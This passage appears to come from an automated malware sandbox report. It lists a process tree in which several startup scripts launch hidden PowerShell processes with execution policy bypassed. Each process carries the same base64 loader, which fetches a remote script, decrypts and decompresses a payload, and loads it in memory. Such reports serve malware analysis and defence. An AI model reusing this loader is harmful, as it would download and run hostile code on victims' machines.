RibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2456 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6284 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8008 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6804 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3844 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4188 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7272 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7104 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6860 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIs